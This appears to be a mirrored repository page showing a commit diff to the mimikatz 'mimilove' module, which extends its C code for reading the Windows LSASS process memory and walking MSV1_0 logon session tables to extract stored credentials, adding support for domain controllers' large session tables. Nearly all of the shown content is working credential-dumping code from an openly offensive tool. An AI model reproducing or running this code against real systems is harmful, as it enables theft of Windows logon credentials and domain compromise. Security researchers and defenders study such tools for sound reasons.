RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

mimilove DC support (large table handle instead of small)

This commit is contained in:
Benjamin DELPY 2015-07-19 15:15:31 +02:00
parent 9bac6378c6
commit f686a7400d
3 changed files with 118 additions and 93 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
mimilove/mimilove.c
View File

@ -86,13 +86,14 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv; KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory}; KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
PVOID base; PVOID baseTable, base;
KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table; KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
KIWI_MSV1_0_LIST_50 list; KIWI_MSV1_0_LIST_50 list;
KIWI_MSV1_0_ENTRY_50 entry; KIWI_MSV1_0_ENTRY_50 entry;
KIWI_MSV1_0_CREDENTIALS credentials; KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials; KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred; PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred;
DWORD tableCount = 0, i;
kprintf(L"========================================\n" kprintf(L"========================================\n"
L"LSASRV Credentials (MSV1_0, ...)\n" L"LSASRV Credentials (MSV1_0, ...)\n"
@ -109,6 +110,25 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
{ {
if(aLsassMemory.address = base) // buffer if(aLsassMemory.address = base) // buffer
{ {
aLocalMemory.address = &table;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
{
if(table.tag == 'XTHL')
{
tableCount = 16;
baseTable = (PBYTE) aLsassMemory.address + sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50);
}
else if(table.tag == 'XTHS')
{
tableCount = 1;
baseTable = aLsassMemory.address;
}
else PRINT_ERROR(L"unknown table tag\n");
}
for(i = 0; i < tableCount ; i++)
{
aLsassMemory.address = (PBYTE) baseTable + i * sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50);
aLocalMemory.address = &table; aLocalMemory.address = &table;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50))) if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
{ {
@ -230,6 +250,7 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
} }
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50"); else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50");
} }
}
else PRINT_ERROR(L"LogonSessionTable is NULL\n"); else PRINT_ERROR(L"LogonSessionTable is NULL\n");
} }
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1"); else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");

9
mimilove/mimilove.h
View File

@ -72,12 +72,19 @@ typedef struct _KIWI_MSV1_0_LIST_50 {
PKIWI_MSV1_0_ENTRY_50 entry; PKIWI_MSV1_0_ENTRY_50 entry;
} KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50; } KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50;
typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 { typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 { // small
DWORD tag; DWORD tag;
DWORD unk0; DWORD unk0;
DWORD count; DWORD count;
DWORD unk1; DWORD unk1;
LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50 LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50
PVOID unkDelete;
DWORD unk2;
DWORD unk3;
DWORD unk4;
DWORD unk5;
DWORD unk6;
DWORD unk7;
} KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50; } KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50;
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 { typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {

3
mimilove/mimilove.vcxproj.filters
View File

@ -46,9 +46,6 @@
<Filter Include="common modules"> <Filter Include="common modules">
<UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier> <UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier>
</Filter> </Filter>
<Filter Include="sekurlsa">
<UniqueIdentifier>{22523588-1016-45eb-b8d6-cc8f2763c695}</UniqueIdentifier>
</Filter>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="mimilove.rc" /> <ResourceCompile Include="mimilove.rc" />